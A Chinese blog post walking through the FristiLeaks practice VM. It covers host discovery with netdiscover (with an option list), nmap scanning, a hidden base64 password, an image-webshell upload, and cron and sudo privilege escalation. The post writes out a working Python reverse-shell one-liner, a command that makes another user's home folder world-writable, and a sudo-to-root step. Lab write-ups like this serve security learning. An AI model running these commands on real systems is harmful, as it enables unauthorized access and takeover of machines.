当前位置:   article > 正文

记第二次面向wp的FirstLeaks靶场实操

记第二次面向wp的FirstLeaks靶场实操

怎么说呢,总的打下来,这个靶场相对来说更接近于ctf一点。

开始。

1.信息收集

确定靶机地址。

详细用法:

-i device (网卡设备) 嗅探和注入数据包的网络接口。如果未指定接口,则将使用第一个可用的网卡接口(可用ifconfig命令查看)。

-r range (IP地址范围) 扫描给定范围而不是自动扫描。有效范围值区域例如:192.168.0.0/24,192.168.0.0/16或 192.168.0.0/8。目前,可接受的范围只有/8,/16和/24.(/8,/16,/24代表掩码)。

-l file (给定文件列表) 扫描包含在给定文件中的范围,每行必须只包含一个范围。

-p (passive:被动模式) 启用被动模式。在被动模式下,netdiscover不会发送任何内容,而只会嗅探。

-m file (给定文件列表) 扫描已知MAC和主机名的列表。

-F filter (过滤器) 自定义pcap过滤器表达式(默认值:"arp",过滤器表达式可以自己定义)。

-s time (时间) 每次ARP请求注入之间的睡眠给定时间(指定等待时间,以毫秒为单位)。(默认1)

-n node (节点) 用于扫描的源IP的最后一个IP八位字节(八位二进制).如果已使用默认主机(x.x.x.67),您可以更改它。(允许范围是2到253,默认67)

-c count (计数,发包数量) 发送每个ARP请求的次数。对于有数据包丢失的网络很有用,因此它将扫描每个主机的给定时间.(默认1)

-d 忽略主目录中的配置文件(仅适用于自动扫描和快速模式)。这将使用默认范围和IP进行自动扫描和快速模式。有关配置文件的信息,请参见下文。

-f 启用快速模式扫描。这只会扫描每个网络上的 .1、.100 和 .254,此模式在搜索正在使用的范围时很有用,找到此类范围后,您可以进行特定范围扫描以查找在线主机。

-P 生成适合重定向到文件或由另一个程序解析的输出,而不是使用交互模式。启用此选项,netdiscover将在扫描给定范围后停止(输出一个能让另一个程序解析的格式)。

-L 与-P类似,但在主动扫描后继续执行程序以被动捕获ARP数据包。

-N 不打印标题。仅在启用-P或-L时有效。

netdiscover -i eth0 -r 192.168.107.0/24

确定靶机ip地址。

端口扫描

nmap用SYN方法扫端口发现一个80端口。

然后基于端口重扫。

扫出来robots.txt文件,下面顺便展示了robots.txt下有什么。

那就进网去看看。

网站检查

发现三个子目录里都是这张图:"这不是你要找的url”。

说明应该是要我们去找url。

找了半天没找到。

最后看了wp,说是ip后加.....

属于是肯尼迪出的题了。

进去之后是这样的,要我们登录,首先想到爆破和post注入。

打开bp抓包然后放进sqlmap里先注入。

发现没结果。

那就再看看网页还有什么东西。

查看源码发现一个eezeepz的名字,一个base64编码。

以图片形式用火狐查看

data:img/png;base64,+base64编码

好像是个密码,那前面那个ez可能就是用户名。

2.漏洞利用

进去了,这里有个文件上传漏洞,说是要上传png,gif,jpg。

那就写个图片马上去,说是传到了uploads上,那就用这个目录打开我们的马。

要养成习惯不管写什么马都多跟一个phpinfo();

因为可以第一时间知道图片马是否成功。

现在看来是成功了。

那就可以反弹shell(为什么标红是因为不会,还得学,这个是看了教程然后看了wp才会的)。

python -c 'import  socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.107.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

拿到权限之后去eezeepz的目录下查看发现一个notes。 

cat一下。

歌词大意:

哟EZ,

我让你可以做一些自动检查,
但我只允许您访问 /usr/bin/* 系统二进制文件。我做了
但是,将一些额外的经常需要的命令复制到我的homedir:

chmod, df, cat, echo, ps, grep, egrep

这样你就可以使用它们从 /home/admin/

不要忘记为每个二进制文件指定完整路径!

只需在 /tmp/ 中放入一个名为“runthis”的文件,每行一个命令即可。这
输出转到 /tmp/ 中的文件“cronresult”。它应该
使用“我的帐户”权限运行每分钟。

简单编写

echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis

 运行之后发现home目录的权限变了。

下面有两个加密后的文件,还有一个加密脚本。

看一下脚本。

那就解一下。

解出来是这个。

加上在home下面我们发现了三个用户。

有个fristigod,那就让用户变成fristigod,密码应该是lettherebefristi!。

进去了,查看权限。

发现有个文件是通过这个可执行文件可以获得全权。

然后看了wp说是。

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom su -

ok了。 

3.总结

1.图片马我原来用的是get方法是传参,但是bash去reshell的时候一直不行,就想着用post,结果还是不行,后来用的python一下就好了,不知道咋回事。
2.linux系统还是不太熟,有些时候代码真不知道怎么写。

3.还是没有养成记笔记的好习惯。

总的来说这个靶场虽然和打起来和ctf差不多,但是费神,也是第一次接触到反弹shell这个东西,还得学吧只能说。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Guff_9hys/article/detail/777856
推荐阅读
相关标签
  

闽ICP备14008679号